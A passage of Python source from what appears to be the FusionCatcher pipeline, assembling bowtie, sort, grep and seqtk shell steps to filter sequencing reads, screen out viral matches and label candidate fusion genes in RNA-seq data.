    job.run()

    last_candidate_file = outdir('candidate_fusion-genes_1000.txt')
    if options.label_file:
        title = options.label_title.strip().split(',')
        files = options.label_file.strip().split(',')
        thres = None
        if options.label_threshold:
            thres = options.label_threshold.strip().split(',')
        ainput = outdir('candidate_fusion-genes_custom___0.txt')
        job.link(last_candidate_file, ainput, temp_path = temp_flag)
        aout = ainput[:]
        for i in xrange(len(title)):
            ain = ainput.replace("___0.txt","___%s.txt" % (i,))
            aout = ainput.replace("___0.txt","___%s.txt" % (i+1,))
            job.add(_FC_+'label_fusion_genes.py',kind='program')
            job.add('--input',ain,kind='input',temp_path=temp_flag)
            job.add('--label',title[i],kind='parameter')
            if thres and thres[i] != '0':
                job.add('--filter_gene_pairs_threshold',thres[i],kind='parameter')
            job.add('--filter_gene_pairs',files[i],kind='input')
            job.add('--output_fusion_genes',aout,kind='output')
            job.run()
        job.link(aout, outdir('candidate_fusion-genes_custom___last.txt'), temp_path = temp_flag)
    else:
        job.link(last_candidate_file, outdir('candidate_fusion-genes_custom___last.txt'), temp_path = temp_flag)
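    # The custom labels above expect --label-title/--label-file (and optionally
    # --label-threshold) to be parallel comma-separated lists, per the parsing
    # code: one label name, one gene-pair file, and one threshold per entry.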
job.add('--output',outdir('candidate_fusion-genes_exon-exon.txt'),kind='output') job.add('--output_fusion',outdir('candidate_fusion-genes_further.txt'),kind='output') job.add('--output_fusion_reads',outdir('candidate_fusion-genes_further_paired-reads.txt'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('grep',kind='parameter') job.add('-F',kind='parameter') job.add('-f',datadir('custom_genes_mark.txt'),kind='input') job.add('',outdir('candidate_fusion-genes_further.txt'),kind='input') job.add('>',outdir('candidate_fusion-genes_further_mark.txt'),kind='output') job.run(successful_exit_status=(0,1)) job.add('LC_ALL=C',kind='program') job.add('grep',kind='parameter') job.add('-F',kind='parameter') #job.add('-f',datadir('ig_loci.txt'),kind='input') job.add('-f',datadir('gap_fusions.txt'),kind='input') job.add('',outdir('candidate_fusion-genes_further.txt'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('grep',kind='parameter') job.add('"known"',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('grep',kind='parameter') job.add('"further_analysis"',kind='parameter') job.add('>',outdir('candidate_fusion-genes_further_eporcrlf2igh.txt'),kind='output') job.run(successful_exit_status=(0,1)) eporcrlf2igh = False if job.iff( organism == 'homo_sapiens' and max_len_reads > 74 and (not empty(outdir('candidate_fusion-genes_further_eporcrlf2igh.txt'))), id ="#candidate_fusion-genes_further_eporcrlf2igh#"): eporcrlf2igh = True job.add('LC_ALL=C',kind='program') job.add('cut',kind='parameter') job.add('-f','1,2',kind='parameter') job.add('',outdir('candidate_fusion-genes_further_eporcrlf2igh.txt'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('"\\t"',kind='parameter') job.add('"\\n"',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') job.add('>',outdir('eporcrlf2_temp.txt'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('comm',kind='parameter') job.add('-23',kind='parameter') job.add('',outdir('eporcrlf2_temp.txt'),kind='input',temp_path='yes') #job.add('',datadir('ig_loci.txt'),kind='input') job.add('',datadir('gap_fusions.txt'),kind='input') job.add('>',outdir('eporcrlf2.txt'),kind='output') job.run() # save preliminary list of candidate fusion genes job.add(_FC_+'add_ambiguous_counts.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_further.txt'),kind='input') job.add('--input_ambiguous',outdir('all_ambiguous_genes.txt'),kind='input') job.add('--output',outdir('preliminary-list_candidate-fusion-genes.txt'),kind='output') job.run() candidates = True if job.iff(empty(outdir('candidate_fusion-genes_exon-exon.txt')) , id = "#no-candidate-fusion-genes-found-1#"): # or empty(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fq') candidates = False t = ["="*80, "WARNING: No candidate fusion genes have been found (due to no paired-reads", " being found which support any possible fusion gene)!", "="*80 ] job.write(t, stderr=True) if job.run(): file(info_file,'a').writelines([el.rstrip('\r\n')+'\n' for el in [""]+t+[""]]) # if (not candidates) and (not options.keep_viruses): # t = ["="*80, # "WARNING: Viruses statistics and filtering has been skipped due to no fusions beeing found!", # " If one wants to have even in cases when no fusion genes are found then always ", # " (re)run 
FusionCatcher using '--keep-viruses-alignments' command line option!",
#          "="*80
#         ]
#    job.write(t, stderr=True)
#    if job.run():
#        file(info_file,'a').writelines([el.rstrip('\r\n')+'\n' for el in [""]+t+[""]])

# summarize the exon-exon mappings -- just get the header
job.add(_FC_+'build_report_fusions_map.py',kind='program')
job.add('--output_super_summary',outdir('candidate_fusion_genes_summary_BOWTIE.txt'), kind='output')
job.add('--output_zip_fasta',outdir('supporting-reads_gene-fusions_BOWTIE.zip'), kind='output')
job.run()

#job.clean(outdir('reads_filtered_transcriptome_sorted-read.map'),temp_path=temp_flag)
job.clean(outdir('original.fq.gz'),temp_path=temp_flag)
#job.clean(outdir('originala.fq.gz'),temp_path=temp_flag if options.skip_spotlight else 'no')
#job.clean(outdir('candidate_fusion-genes_missing_mates.txt'),temp_path=temp_flag)
#job.clean(outdir('candidate_fusion-genes_supporting_paired-reads.txt'),temp_path=temp_flag if options.skip_spotlight else 'no')
#job.clean(outdir('candidate_fusion-genes_exon-exon.txt'))

#if candidates or options.keep_viruses: # this has been removed in order to always get the viruses statistics
if options.skip_viruses_filtering and (not options.keep_viruses) and (not candidates):
    t = ["="*80,
         "WARNING: Viruses statistics and filtering have been skipped due to no fusions ",
         " being found and use of command line option '--skip-vir'!",
         "="*80
        ]
    job.write(t, stderr=True)
    if job.run():
        file(info_file,'a').writelines([el.rstrip('\r\n')+'\n' for el in [""]+t+[""]])

##############################################################################
# FIND EXON-EXON JUNCTION IN FUSION GENES
##############################################################################
if job.iff(not empty(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fq')), id = "#no-candidate-fusion-genes-found-1A#"):
    if not options.skip_unmapped_pairs_filtering:
        job.add('LC_ALL=C',kind='program')
        job.add('cat',kind='parameter')
        job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fq'),kind='input')
        job.add('|',kind='parameter')
        job.add('LC_ALL=C',kind='parameter')
        job.add('paste','- - - -',kind='parameter')
        job.add('|',kind='parameter')
        job.add('LC_ALL=C',kind='parameter')
        job.add('sort',kind='parameter')
        job.add('-k','1,1',kind='parameter')
        job.add('-t',"'\t'",kind='parameter')
        if sort_buffer:
            job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no')
        if sort_parallel:
            job.add('--parallel',options.processes,kind='parameter',checksum='no')
        if sort_lzop_compress:
            job.add('--compress-program','lzop',kind='parameter',checksum='no')
        elif sort_gzip_compress:
            job.add('--compress-program','gzip',kind='parameter',checksum='no')
        job.add('-T',tmp_dir,kind='parameter',checksum='no')
        job.add('|',kind='parameter')
        job.add(_FC_+'droppe.py',kind='parameter')
        job.add('-i','-',kind='input')
        if options.trim_3end_keep2 != 0:
            job.add('-k',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex.good'),kind='input')
        job.add('-f',info_file,kind='parameter',checksum='no')
        job.add('-o','-',kind='output')
        job.add('|',kind='parameter')
        job.add('LC_ALL=C',kind='parameter')
        job.add('tr',kind='parameter')
        job.add('"\\t"',kind='parameter')
        job.add('"\\n"',kind='parameter')
        job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fu.fq'),kind='output')
        job.run()
    else:
        job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fq'),
                 outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fu.fq'),
temp_path=temp_flag) # # FIND the FUSION POINT # if options.mismatches < 2: # stjude # before was 3 ############################################################################## # FILTER the unmapped reads ############################################################################## # map on transcriptome again job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','500',kind='parameter') job.add('-v','2',kind='parameter') #options.mismatches # stjude # before was 3 job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-m','1',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--tryhard',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--suppress','5,6,7',kind='parameter') job.add('--un',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_more.fq'),kind='output') # here is the result job.add('--max',outdir('reads_filtered_not-mapped_multiple.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fu.fq'),kind='input',temp_path=temp_flag) #job.add('',outdir('reads-unmapped-filtered-trans.map'),kind='output') job.add('2>',outdir('log_bowtie_reads-unmapped-filtered-out-transcriptome.stdout.txt'),kind='output',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') # XXX #job.run() job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') #job.add('-s',kind='parameter') # stable sort job.add('-t',"'\t'",kind='parameter') job.add('-k','1,1',kind='parameter') #job.add('',outdir('reads-unmapped-filtered-trans.map'),kind='input',temp_path = temp_flag) job.add('>',outdir('reads-unmapped-filtered-trans.sorted.map'),kind='output') job.run() info(job, fromfile = outdir('log_bowtie_reads-unmapped-filtered-out-transcriptome.stdout.txt'), tofile = info_file, top = ["Mapping all reads (which do not map on genome and do not map on transcriptome) on transcriptome for filtering purposes:", "-----------------------------------------------------------------------------------------------------------------------"], bottom = "\n\n\n", temp_path = temp_flag) if job.iff( not empty(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_more.fq')), id = "#reads_filtered_not-mapped-genome_not-mapped-transcriptome_more.fq-empty#"): job.add('LC_ALL=C',kind='program') job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: 
job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') #job.add('-s',kind='parameter') # stable sort job.add('-t',"'\t'",kind='parameter') job.add('-k','1,1',kind='parameter') job.add('-m',kind='parameter') job.add('',outdir('reads-unmapped-filtered-trans.sorted.map'),kind='input',temp_path = temp_flag) job.add('',outdir('reads_filtered_transcriptome_sorted-read.map'),kind='input',temp_path = temp_flag) # job.add('-',kind='parameter') job.add('>',outdir('reads_filtered_transcriptome_sorted-read_end.map'),kind='output') job.run() # map on genome again job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','200',kind='parameter') job.add('-v','0',kind='parameter') #options.mismatches # stjude # it was 3 before job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-m','20',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--tryhard',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') # job.add('--suppress','1,2,3,4,5,6,7,8',kind='parameter') job.add('--un',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end.fq'),kind='output') # here is the result job.add('--max',outdir('reads_filtered_not-mapped_multiple_end.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if bowtie123: job.add('',datadir('genome_index2/index'),kind='input') else: if os.path.isfile(datadir('genome_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('genome_index/'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_more.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads-unmapped-filtered-geno.map'),kind='output',temp_path=temp_flag) # job.add('','/dev/null',kind='parameter') job.add('2>',outdir('log_bowtie_reads-unmapped-filtered-out-genome.stdout.txt'),kind='output',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') job.run() job.clean(outdir('log_bowtie_reads-unmapped-filtered-out-genome.stdout.txt'),temp_path=temp_flag) else: job.clean(outdir('reads-unmapped-filtered-trans.sorted.map'),temp_path=temp_flag) job.link(outdir('reads_filtered_transcriptome_sorted-read.map'), outdir('reads_filtered_transcriptome_sorted-read_end.map'), temp_path = temp_flag) job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fu.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end.fq'), temp_path = temp_flag, kind = 'soft') else: job.link(outdir('reads_filtered_transcriptome_sorted-read.map'), outdir('reads_filtered_transcriptome_sorted-read_end.map'), temp_path = temp_flag) job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fu.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end.fq'), temp_path = temp_flag, kind = 'soft') # filter out the reads with poly tail # trim the poly tails job.add(_FC_+'trim_poly_tails.py',kind='program') job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end.fq'),kind='input',temp_path=temp_flag) job.add('--repeats',length_anchor_minimum - 1,kind='parameter') # 12 #job.add('--skip_reads',kind='parameter') job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f2b.fq'),kind='output') job.run() # clip 
the low quality ends job.add(_FC_+'clip_quality.py',kind='program') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('-t',options.trim_quality,kind='parameter') # below Q5 trimming starts job.add('--score-type','sanger',kind='parameter') job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f2b.fq'),kind='input',temp_path=temp_flag) job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f2.fq'),kind='output') job.run() # remove reads shorter than a given threshold # job.add('remove_shorter_reads.py',kind='program') # job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f2.fq'),kind='input',temp_path=temp_flag) # job.add('--threshold',outdir('log_minimum_length_short_read.txt'),kind='parameter',from_file='yes') # job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f3.fq'),kind='output') # job.run() job.add(_SK_+'seqtk',kind='program') job.add('seq',kind='parameter') job.add('-L',outdir('log_minimum_length_short_read.txt'),kind='parameter',from_file='yes') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f2.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f3.fq'),kind='output') job.run() if options.filter_str: # remove STR reads job.add(_FC_+'remove_str.py',kind='program') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('--threshold',options.filter_str,kind='parameter',checksum='no') job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f3.fq'),kind='input',temp_path = temp_flag) job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f4.fq'),kind='output') # job.add('--str',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f4-str.fq'),kind='output',temp_path = temp_flag) job.add('--log',outdir('log_reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f4-str.txt'),kind='output') job.run() job.add('cat',kind='program') job.add('',outdir('log_reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f4-str.txt'),kind='input',temp_path = temp_flag) job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\n\n\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() else: job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f3.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f4.fq'), temp_path=temp_flag) # remove the reads which map on viruses genomes downloaded from NCBI if not options.skip_viruses_filtering: if options.keep_viruses: # convert the quality scores to Illumina Solexa version 1.5 format job.add(_FC_+'phred.py',kind='program') job.add('--link','soft',kind='parameter') job.add('--input',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f4.fq'),kind='input') job.add('--output',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f4-sam.fq'),kind='output') job.add('--input_type','auto-detect',kind='parameter') job.add('--output_type','sanger',kind='parameter') job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') job.run() job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') if bowtie121: job.add('--no-unal',kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') 
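# Note on the bowtie 1 options used below: '--seedmms N' allows at most N
# mismatches inside the seed (the first '--seedlen' bases of the read), and
# '--trim5 7' removes 7 bases from the 5' end of each read on the fly before
# alignment (the nearby "trim the 10" comment is stale).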
#job.add('-v',options.filter_mismatches,kind='parameter') #options.mismatches #job.add('-v','0',kind='parameter') job.add('--seedmms','0',kind='parameter') # options.mismatches job.add('--seedlen',options.trim_3end_keep,kind='parameter') job.add('--trim5','7',kind='parameter') # trim the 10 job.add('-p',options.processes,kind='parameter',checksum='no') #job.add('-m','1',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','500',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--sam',kind='parameter') #job.add('--tryhard',kind='parameter') #job.add('--best',kind='parameter') #job.add('--strata',kind='parameter') # if len_reads > 40 and options.trim_wiggle: # job.add('--trim3',options.trim_wiggle,kind='parameter') # trim on the fly 5bp from 3' end # job.add('--trim5',options.trim_wiggle,kind='parameter') # trim the 5 if os.path.isfile(datadir('viruses_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('viruses_index/'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f4-sam.fq'),kind='input',temp_path=temp_flag) #job.add('',outdir('reads-mapped-on-viruses.sam'),kind='output') job.add('2>',outdir('log_sam-viruses.stdout.txt'),kind='output',checksum='no') job.add('|',kind='parameter') if not bowtie121: job.add('LC_ALL=C',kind='parameter') job.add('awk',"""'$3 == "*" { next } { print }'""",kind='parameter') job.add('|',kind='parameter') if pigz: job.add(_PZ_+'pigz',kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') else: job.add('gzip',kind='parameter') job.add('--fast',kind='parameter') job.add('>',outdir('reads-mapped-on-viruses.sam.gz'),kind='output') job.run() info(job, fromfile = outdir('log_sam-viruses.stdout.txt'), tofile = info_file, top = ["Mapping all reads on viruses/bacteria genomes in order to generate SAM file:", "----------------------------------------------------------------------------"], bottom = "\n\n\n", temp_path = temp_flag) # remove unmapped reads #samtools view -hS -F 4 mapped_unmapped.sam > mapped_only.sam job.add('printf',kind='program') job.add(('"\n\nMapping all input reads on viruses genomes database for filtering purposes:\n'+ '--------------------------------------------------------------------------------\n"'),kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') #job.add('-v',options.filter_mismatches,kind='parameter') #options.mismatches #job.add('-v','0',kind='parameter') #options.mismatches job.add('--seedmms','0',kind='parameter') # options.mismatches job.add('--seedlen',options.trim_3end_keep,kind='parameter') job.add('--trim5','7',kind='parameter') # trim the 10 job.add('-p',options.processes,kind='parameter',checksum='no') #job.add('-m','1',kind='parameter') job.add('-k','1',kind='parameter') #job.add('--solexa1.3-quals',kind='parameter') job.add('--phred33-quals',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') # job.add('--tryhard',kind='parameter') #job.add('--best',kind='parameter') #job.add('--strata',kind='parameter') # if len_reads > 40 and options.trim_wiggle: # job.add('--trim3',options.trim_wiggle,kind='parameter') # trim on the fly 5bp from 3' end # 
job.add('--trim5',options.trim_wiggle,kind='parameter') # trim the 5 job.add('--suppress','1,2,4,5,6,7,8',kind='parameter') # originally was: '2,3,4,5,6,7,8' job.add('--un',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f5.fq'),kind='output') # here is the result job.add('--max',outdir('reads-filtered_temp_multiple-viruses.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('viruses_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('viruses_index/'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f4.fq'),kind='input',temp_path=temp_flag) #job.add('',outdir('reads-filtered-viruses.map'),kind='output') # XXX job.add('2>>',info_file,kind='parameter',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') #job.run() job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') #job.add('',outdir('reads-filtered-viruses.map'),kind='input',temp_path=temp_flag) # XXX job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('-c',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-rn',kind='parameter') job.add('-k','1,1',kind='parameter') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('viruses_bacteria_temp.txt'),kind='output') job.run() info(job, fromfile = outdir('viruses_bacteria_temp.txt'), tofile = info_file, top = ["","","", "Viruses found to have reads mapped on their genomes:", "----------------------------------------------------", "Reads_count\tOrganism"], bottom = "\n\n\n") job.add('printf',kind='program') job.add('"Counts_of_mapping_reads\tVirus/Bacteria/Phage\n"', kind='parameter') job.add('>',outdir('viruses_bacteria_header.txt'),kind='output') job.run() job.add('cat',kind='program') job.add('',outdir('viruses_bacteria_header.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('viruses_bacteria_temp.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('viruses_bacteria_phages.txt'),kind='output') job.run() # job.add('printf',kind='program') # job.add(('"\n\n\nViruses found to have reads mapped on their genomes:\n'+ # '---------------------------------------------------------\n'+ # 'Reads_count\tOrganism\n"'),kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('viruses_statistics.txt'),kind='input',temp_path=temp_flag) # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() else: job.add('printf',kind='program') job.add('"Counts_of_mapping_reads\tVirus/Bacteria/Phage\n"', kind='parameter') job.add('>',outdir('viruses_bacteria_phages.txt'),kind='output') job.run() job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f4.fq'), 
outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f5.fq'), temp_path=temp_flag) if job.iff(empty(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f5.fq')), id="#no-candidate-fusion-genes-found-t5#"): pass else: # filter -- map on genome again the trimmed reads with 11 bp from 3' end job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') # job.add('-a',kind='parameter') job.add('-v','0',kind='parameter') #options.mismatches job.add('-p',options.processes,kind='parameter',checksum='no') # job.add('-m','1',kind='parameter') job.add('-k','10',kind='parameter') job.add('--tryhard',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') # job.add('--best',kind='parameter') # job.add('--strata',kind='parameter') if len_reads > 40: job.add('--trim5', length_anchor_minimum - 7, kind='parameter') # trim 11 bp on the fly else: job.add('--trim5', length_anchor_minimum - 9, kind='parameter') # trim 11 bp on the fly # job.add('--suppress','1,2,3,4,5,6,7,8',kind='parameter') job.add('--un',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'),kind='output') # here is the result job.add('--max',outdir('reads_filtered_not-mapped_multiple_end2.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if bowtie123: job.add('',datadir('genome_index2/index'),kind='input') else: if os.path.isfile(datadir('genome_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('genome_index/'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end-f5.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads-unmapped-filtered-geno_last.map'),kind='output',temp_path=temp_flag) # job.add('','/dev/null',kind='parameter') job.add('2>',outdir('log_bowtie_reads-unmapped-filtered-out-genome_last.stdout.txt'),kind='output',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') job.run() info(job, fromfile = outdir('log_bowtie_reads-unmapped-filtered-out-genome_last.stdout.txt'), tofile = info_file, top = ["Mapping all trimmed unmapped reads again on genome for filtering purposes:", "-------------------------------------------------------------------------"], bottom = "\n\n\n", temp_path = temp_flag) # job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end2.fq'), # outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'), # temp_path=temp_flag) # # filter -- map on genome again the trimmed reads with 11 bp from 5' end # job.add('bowtie',kind='program') # job.add('-t',kind='parameter') # job.add('-q',kind='parameter') ## job.add('-a',kind='parameter') # job.add('-v','1',kind='parameter') #options.mismatches # job.add('-p',options.processes,kind='parameter',checksum='no') ## job.add('-m','1',kind='parameter') # job.add('--tryhard',kind='parameter') # job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') ## job.add('--best',kind='parameter') ## job.add('--strata',kind='parameter') # job.add('--trim3','13',kind='parameter') # trim 11 bp on the fly # job.add('--suppress','2,3,4,5,6,7,8',kind='parameter') # job.add('--un',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'),kind='output') # here is the result # job.add('--max',outdir('reads_filtered_not-mapped_multiple_final.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads 
are going to '--un'
#    job.add('',datadir('genome_index/'),kind='input')
#    job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_end2.fq'),kind='input',temp_path=temp_flag)
#    job.add('',outdir('reads-unmapped-filtered-geno_last.map'),kind='output',temp_path=temp_flag)
#    job.add('>',outdir('log_bowtie_reads-unmapped-filtered-out-genome_last.stdout.txt'),kind='parameter',checksum='no')
#    job.add('2>&1',kind='parameter',checksum='no')
#    job.run()

double_bowtie = False
if max_len_reads > min_len_reads:
    double_bowtie = True

if job.iff(empty(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq')), id="#no-candidate-fusion-genes-found-2#"):
    if candidates and (not double_bowtie):
        t = ["="*80,
             "WARNING: No candidate fusion genes have been found (no unmapped reads found and reads are not long enough either)!",
             "="*80
            ]
        job.write(t, stderr=True)
        if job.run():
            file(info_file,'a').writelines([el.rstrip('\r\n')+'\n' for el in [""]+t+[""]])
        # summarize the exon-exon mappings -- just get the header
        job.add(_FC_+'build_report_fusions_map.py',kind='program')
        job.add('--output_super_summary',outdir('candidate_fusion_genes_summary_BOWTIE.txt'), kind='output')
        job.add('--output_zip_fasta',outdir('supporting-reads_gene-fusions_BOWTIE.zip'), kind='output')
        job.run()
        if options.keep_unmapped_reads:
#            job.add('echo',kind='program')
#            job.add('-n','""',kind='parameter')
#            job.add('',outdir('unmapped-reads.fq.gz'), kind='output')
#            job.run()
            job.add('touch',kind='program')
            job.add('',outdir('unmapped-reads.fq.gz'), kind='output')
            job.run()
        candidates = False
    job.clean(outdir('reads_filtered_transcriptome_sorted-read_end.map'),temp_path='no' if double_bowtie and not candidates else temp_flag)
#    #job.link(outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'),
#             outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq')
#            )
elif (not candidates) and options.keep_unmapped_reads:
    # convert FASTQ illumina to sanger
#    job.add('seqtk',kind='program')
#    job.add('seq',kind='parameter')
#    job.add('-Q64',kind='parameter')
#    job.add('-V',kind='parameter')
#    job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'),kind='input',temp_path=temp_flag)
    #job.add('>',outdir('unmapped-reads.fq'),kind='output')
    #job.run()
    #job.add('|',kind='parameter')
    if pigz:
        job.add(_PZ_+'pigz',kind='program')
        job.add('-p',options.processes,kind='parameter',checksum='no')
    else:
        job.add('gzip',kind='program')
        job.add('--fast',kind='parameter')
    job.add('',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'),kind='input',temp_path=temp_flag)
    #job.add('-c',outdir('unmapped-reads.fq'),kind='input',temp_path=temp_flag)
    job.add('>',outdir('unmapped-reads.fq.gz'),kind='output')
    job.run()
#    job.add('phred.py',kind='program')
